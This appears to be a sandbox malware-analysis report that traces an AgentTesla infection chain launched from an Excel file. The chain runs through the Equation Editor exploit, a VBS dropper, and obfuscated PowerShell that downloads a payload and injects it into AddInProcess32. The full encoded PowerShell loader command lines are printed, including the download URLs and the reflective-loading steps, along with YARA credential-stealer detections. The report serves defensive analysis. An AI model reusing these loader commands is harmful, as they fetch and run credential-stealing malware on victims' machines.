                                                                            2024-10-24 06:52:55 UTC1378INData Raw: c9 a2 0a c1 83 32 8f 22 1f 51 5f c4 07 3d c6 6b 7d 84 d4 3e 8b c6 3e d6 46 92 42 d1 a7 83 6a 9c 79 60 fa 76 95 3b 41 20 1e fc e6 27 db 14 0d f6 bd 1c 39 15 a7 d1 15 63 dc 7d de 2a c0 f4 9f b5 e9 e4 66 fb 3d e6 24 b1 ca 9a 3d 92 ab 22 a8 0d b5 18 f0 39 1c b5 73 ed 9f 39 d3 40 41 2e 25 da c3 e1 9f 58 fd b3 cb a6 6f 1d f0 5d 3e a6 49 04 50 a3 89 5d 41 69 0f 0a 68 02 40 ff 00 47 3e 63 19 73 11 0b 11 65 00 0e 08 04 1b e8 6b eb 80 16 49 4a b2 79 a5 95 81 06 85 60 df 46 15 81 f3 38 35 7e 95 be 3e 39 a4 c9 b9 76 15 28 d5 dc 7f 5c 4e 73 e4 05 56 91 c5 9a e2 bf b6 05 f4 30 9f 35 9c 92 39 b5 0d 44 9b f9 65 f5 28 eb 21 60 ea 41 ef b7 a7 eb 93 02 ed 56 70 f2 1f cb fb 64 b9 67 04 17 60 0f ca f0 10 9d dc 00 a6 82 df 04 1e bf 4c 59 1e 35 d4 ac 80 30 2a c1 a8 f7 ae 72 e4
                                                                            Data Ascii: 2"Q_=k}>>FBjy`v;A '9c}*f=$="9s9@A.%Xo]>IP]Aih@G>csekIJy`F85~>9v(\NsV059De(!`AVpdg`LY50*r
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: 8a a3 6f 37 8a 68 7c 54 6a f5 6e a1 58 93 d2 ff 00 0e 06 b1 71 e6 86 14 01 e3 35 1a 26 01 02 90 40 51 98 a6 46 ad a5 68 8f 61 8f 47 3b be 94 12 18 38 e2 fb d6 03 ee 8a 40 e5 77 03 57 ed 99 72 41 73 19 59 82 95 36 6c f1 8d 39 91 62 57 03 e2 d7 94 79 b7 46 43 42 ac 08 a6 e7 00 12 a4 72 c2 35 01 d6 ec f4 c5 11 d9 e4 6d cc 09 19 da 9d f3 41 22 44 16 26 2a 55 6b b6 28 35 02 2d 54 7a 5a b7 65 b2 c7 e0 30 0b a9 94 45 a9 44 67 1b 4f 38 ea ea 12 29 46 c2 b5 fc 40 e2 7a bd 3a 4e ea d2 2a 8d b5 cd e5 e0 81 5d 4c c4 86 8f a5 8c 0d b6 d5 a0 d3 f9 88 a1 56 bf 2c cc 96 68 e6 f5 07 52 4f c7 13 f1 2d 54 ef a0 91 74 e8 ab 10 1b 49 ef 79 e5 9a 79 e3 05 0b 1b 53 d7 bd e0 7b 2d 3c a8 58 a1 75 0c 0f 17 df 0b a9 9d 9b 4a 51 59 42 a9 e2 bd fd b3 c5 cb aa d5 ee 0f 23 b2 9a e0 91
                                                                            Data Ascii: o7h|TjnXq5&@QFhaG;8@wWrAsY6l9bWyFCBr5mA"D&*Uk(5-TzZe0EDgO8)F@z:N*]LV,hRO-TtIyyS{-<XuJQYB#


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to dive into process behavior distribution

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:02:51:52
                                                                            Start date:24/10/2024
                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                            Imagebase:0x13f6c0000
                                                                            File size:28'253'536 bytes
                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:02:52:41
                                                                            Start date:24/10/2024
                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                            Imagebase:0x400000
                                                                            File size:543'304 bytes
                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:6
                                                                            Start time:02:52:44
                                                                            Start date:24/10/2024
                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs"
                                                                            Imagebase:0xab0000
                                                                            File size:141'824 bytes
                                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:7
                                                                            Start time:02:52:47
                                                                            Start date:24/10/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                            Imagebase:0x140000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:02:52:48
                                                                            Start date:24/10/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"
                                                                            Imagebase:0x140000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.526475419.00000000074EA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:10
                                                                            Start time:02:53:07
                                                                            Start date:24/10/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                            Imagebase:0xa30000
                                                                            File size:42'056 bytes
                                                                            MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.622833840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.623977936.00000000023B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:14.2%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:50.9%
                                                                              Total number of Nodes:53
                                                                              Total number of Limit Nodes:4
                                                                              execution_graph 324 3500612 325 3500614 324->325 328 3500627 LoadLibraryW 325->328 329 350062e 328->329 333 3500641 328->333 337 35006dc URLDownloadToFileW 329->337 334 3500644 333->334 335 35006dc 8 API calls 334->335 336 3500652 334->336 335->336 347 35006f5 337->347 342 3500704 ShellExecuteW 362 350072f 342->362 344 3500652 345 3500723 345->344 346 3500732 ExitProcess 345->346 348 35006f7 347->348 349 35006fc 348->349 350 350070a 3 API calls 348->350 351 3500704 ShellExecuteW 349->351 353 35006e5 349->353 350->349 352 350072f ExitProcess 351->352 354 3500723 352->354 356 350070a 353->356 354->353 355 3500732 ExitProcess 354->355 357 350070d ShellExecuteW 356->357 358 350072f ExitProcess 357->358 360 3500723 357->360 358->360 359 35006fc 359->342 359->344 360->359 361 3500732 ExitProcess 360->361 363 3500732 ExitProcess 362->363 364 3500736 GetPEB 365 3500744 364->365 366 350055e ExitProcess 379 3500577 366->379 380 350057d 379->380 383 3500584 380->383 391 3500593 380->391 382 35005cc 383->382 384 35005b4 383->384 385 3500626 383->385 403 3500612 384->403 386 3500641 8 API calls 385->386 387 350062e 386->387 389 35006dc 8 API calls 387->389 390 3500652 389->390 392 3500599 391->392 407 35005ba 392->407 404 3500614 403->404 405 3500627 9 API calls 404->405 406 3500619 405->406 408 35005bd 407->408 409 3500612 9 API calls 408->409 410 35005cc 409->410

                                                                              Callgraph

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 35006dc-3500702 URLDownloadToFileW call 35006f5 call 350070a 6 3500704-3500726 ShellExecuteW call 350072f 0->6 7 3500769-3500775 0->7 8 3500778 6->8 17 3500728 6->17 7->8 10 3500780-3500784 8->10 11 350077a-350077e 8->11 15 3500786-350078a 10->15 16 3500799-350079b 10->16 11->10 14 350078c-3500793 11->14 18 3500795 14->18 19 3500797 14->19 15->14 15->16 20 35007ab-35007ac 16->20 17->16 21 350072a-3500734 ExitProcess 17->21 18->16 22 350079d-35007a6 19->22 25 35007a8 22->25 26 350076f-3500772 22->26 25->20 26->22 28 3500774 26->28 28->8
                                                                              APIs
                                                                              • URLDownloadToFileW.URLMON(00000000,03500652,?,00000000,00000000), ref: 035006DE
                                                                                • Part of subcall function 035006F5: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0350071C
                                                                                • Part of subcall function 035006F5: ExitProcess.KERNEL32(00000000), ref: 03500734
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID: DownloadExecuteExitFileProcessShell
                                                                              • String ID:
                                                                              • API String ID: 3584569557-0
                                                                              • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                              • Instruction ID: a8bc6783f5aa49d5ecb8fadf777948476220f67ac2380a69a6eb494fb8b0b246
                                                                              • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                                              • Instruction Fuzzy Hash: FEF0275058C3403AE611E7746C9EF6E6F64BFC1740F140899F2464F0F3D89E84048E1A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 29 350070a-350071c ShellExecuteW 31 3500723-3500726 29->31 32 350071e call 350072f 29->32 34 3500778 31->34 35 3500728 31->35 32->31 38 3500780-3500784 34->38 39 350077a-350077e 34->39 36 3500799-350079b 35->36 37 350072a-3500734 ExitProcess 35->37 41 35007ab-35007ac 36->41 38->36 43 3500786-350078a 38->43 39->38 42 350078c-3500793 39->42 44 3500795 42->44 45 3500797 42->45 43->36 43->42 44->36 46 350079d-35007a6 45->46 49 35007a8 46->49 50 350076f-3500772 46->50 49->41 50->46 51 3500774 50->51 51->34
                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0350071C
                                                                                • Part of subcall function 0350072F: ExitProcess.KERNEL32(00000000), ref: 03500734
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteExitProcessShell
                                                                              • String ID:
                                                                              • API String ID: 1124553745-0
                                                                              • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                              • Instruction ID: 47a52925d361e0db3a83666470944beaf193c0f4f973d5ac3e04788b56029b7a
                                                                              • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                                              • Instruction Fuzzy Hash: C2014E9454430221EF70E678AC457B9AB50BB41700FCC485BE5810B0F5D55E90C38E1A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 52 35006f5-35006f7 54 35006fc-3500702 52->54 55 35006f7 call 350070a 52->55 56 3500704-3500726 ShellExecuteW call 350072f 54->56 57 3500769-3500775 54->57 55->54 58 3500778 56->58 67 3500728 56->67 57->58 60 3500780-3500784 58->60 61 350077a-350077e 58->61 65 3500786-350078a 60->65 66 3500799-350079b 60->66 61->60 64 350078c-3500793 61->64 68 3500795 64->68 69 3500797 64->69 65->64 65->66 70 35007ab-35007ac 66->70 67->66 71 350072a-3500734 ExitProcess 67->71 68->66 72 350079d-35007a6 69->72 75 35007a8 72->75 76 350076f-3500772 72->76 75->70 76->72 78 3500774 76->78 78->58
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteExitProcessShell
                                                                              • String ID:
                                                                              • API String ID: 1124553745-0
                                                                              • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                              • Instruction ID: 2dbf66eb68738a293f8a5b42facba624ab5e57cc59ee40e295d411543a023de4
                                                                              • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                                              • Instruction Fuzzy Hash: 9001496059830134EB60E2786C88BAEAB94BB81740F98846EE2810B0F1C25E84438E1A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 79 3500627 LoadLibraryW 80 350062e-35006da call 35006dc 79->80 81 3500629 call 3500641 79->81 81->80
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(03500619), ref: 03500627
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 315e0537453bcb71ca42318bac62e4e377d9daaabe0f44570ee63fa4ad907b81
                                                                              • Instruction ID: 86bacf073b8815037e5a3cdb098d877d892775938e9a5338edb1ccc4615d88af
                                                                              • Opcode Fuzzy Hash: 315e0537453bcb71ca42318bac62e4e377d9daaabe0f44570ee63fa4ad907b81
                                                                              • Instruction Fuzzy Hash: DB21289194C7C11FDB26D2706D7DB29BF6A3BA301470DCACED4CA0B4E3E756A101C286

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 101 350072f-3500734 ExitProcess
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(00000000), ref: 03500734
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                              • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                                              • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                                              • Instruction Fuzzy Hash:

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 147 3500736-3500741 GetPEB 148 3500744-3500755 call 350075e 147->148 151 3500757-350075b 148->151
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                              • Instruction ID: cb3c66635d79866a40efd45b2ff74bb5a9c3f7e9f074a98f5186afbaa03cdffa
                                                                              • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                                              • Instruction Fuzzy Hash: 68D052352025028FC708DF04D980F52F37AFFC8611B28C268E4044B6A9D335EC92CA94

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 152 350055e-3500585 ExitProcess call 3500577 call 3500593 157 35005d8-3500604 152->157 158 3500588-3500590 152->158 165 3500605-3500610 157->165 164 3500592-35005a1 158->164 158->165 166 3500613-3500618 164->166 167 35005a3-35005a8 164->167 165->166 169 350061b-3500625 166->169 167->166 170 35005aa 167->170 170->169 171 35005ac-35005b0 170->171 171->165 173 35005b2 171->173 174 35005b4-35005d5 call 3500612 173->174 175 3500626-35006da call 3500641 call 35006dc 173->175 174->157
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(0350054C), ref: 0350055E
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.471163150.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_3500000_EQNEDT32.jbxd
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: b5dc7671b86aaf1abe87ce343bfc73ecda07f80762468e52883e692848f189de
                                                                              • Instruction ID: 0b0601bac2b4fb4df2995bc016a093253fec4acb9e6b473bf7b97f2680c62c03
                                                                              • Opcode Fuzzy Hash: b5dc7671b86aaf1abe87ce343bfc73ecda07f80762468e52883e692848f189de
                                                                              • Instruction Fuzzy Hash: 0811D4A584D7C01FC722C7B079AA26AFF217B5340070D85CF80960B0F3D65A9212D396
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.573929673.000000000024D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0024D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_24d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d52af6841a82a3b3d11e66b2a177981e01921601db356dbe2407182f6322600e
                                                                              • Instruction ID: bc9057ce27dbb61028c6f8227a3eb5b03cff3e72421b75f36eb379e5c8680537
                                                                              • Opcode Fuzzy Hash: d52af6841a82a3b3d11e66b2a177981e01921601db356dbe2407182f6322600e
                                                                              • Instruction Fuzzy Hash: CC018C6140D3C09FE7164A218C94752BFA4EF43724F1985CBE8848F1A3C2685C45CBB2
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.573929673.000000000024D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0024D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_24d000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 0e9d40324ea5e0b9c02bae316ad99d71efa56a4d2cdfe90139f64c3a4b723bd2
                                                                              • Instruction ID: a2414b839cd6b1f131c174f2154567cfea649e29529f8cdf42d7f569d86213fa
                                                                              • Opcode Fuzzy Hash: 0e9d40324ea5e0b9c02bae316ad99d71efa56a4d2cdfe90139f64c3a4b723bd2
                                                                              • Instruction Fuzzy Hash: AA01F730524340EBE7184E15CC84766BB98DF41764F18C51AEC480F182C2B99941C6B1

                                                                              Execution Graph

                                                                              Execution Coverage:6.4%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:61
                                                                              Total number of Limit Nodes:6
                                                                              execution_graph 10291 28846a 10293 288472 10291->10293 10294 288397 10293->10294 10295 28842e 10294->10295 10298 2884ae 10294->10298 10296 28849e 10299 2884df 10298->10299 10300 2884f4 10299->10300 10303 28850f 10299->10303 10324 2884ae 8 API calls 10299->10324 10325 288528 10299->10325 10300->10296 10302 288a63 10304 288ce5 CreateProcessW 10302->10304 10321 288a79 10302->10321 10303->10302 10348 2879ac 10303->10348 10308 288d59 10304->10308 10305 288634 10305->10302 10306 2879b8 Wow64SetThreadContext 10305->10306 10307 288692 10306->10307 10307->10302 10309 288781 VirtualAllocEx 10307->10309 10310 2887ce 10309->10310 10311 2887f9 VirtualAllocEx 10310->10311 10312 28884d 10310->10312 10311->10312 10312->10302 10313 2879d0 WriteProcessMemory 10312->10313 10315 28888a 10313->10315 10314 288998 10314->10302 10316 2879d0 WriteProcessMemory 10314->10316 10315->10302 10315->10314 10322 2879d0 WriteProcessMemory 10315->10322 10317 2889c1 10316->10317 10317->10302 10318 2879dc Wow64SetThreadContext 10317->10318 10319 288a1f 10318->10319 10319->10302 10320 288a23 ResumeThread 10319->10320 10320->10302 10321->10296 10322->10315 10324->10299 10326 2885a1 10325->10326 10327 2879ac CreateProcessW 10326->10327 10337 288a63 10326->10337 10329 288634 10327->10329 10328 288ce5 CreateProcessW 10331 288d59 10328->10331 10329->10337 10352 2879b8 10329->10352 10332 288692 10334 288781 VirtualAllocEx 10332->10334 10332->10337 10333 288a79 10333->10299 10335 2887ce 10334->10335 10336 2887f9 VirtualAllocEx 10335->10336 10338 28884d 10335->10338 10336->10338 10337->10328 10337->10333 10338->10337 10356 2879d0 10338->10356 10340 28888a 10340->10337 10341 288998 10340->10341 10347 2879d0 WriteProcessMemory 10340->10347 10341->10337 10342 2879d0 WriteProcessMemory 10341->10342 10343 2889c1 10342->10343 10343->10337 10360 2879dc 10343->10360 10346 288a23 ResumeThread 10346->10337 10347->10340 10349 288c00 CreateProcessW 10348->10349 10351 288d59 10349->10351 10351->10351 10353 288e40 Wow64SetThreadContext 10352->10353 10355 288eba 10353->10355 10355->10332 10357 288fb8 WriteProcessMemory 10356->10357 10359 289043 10357->10359 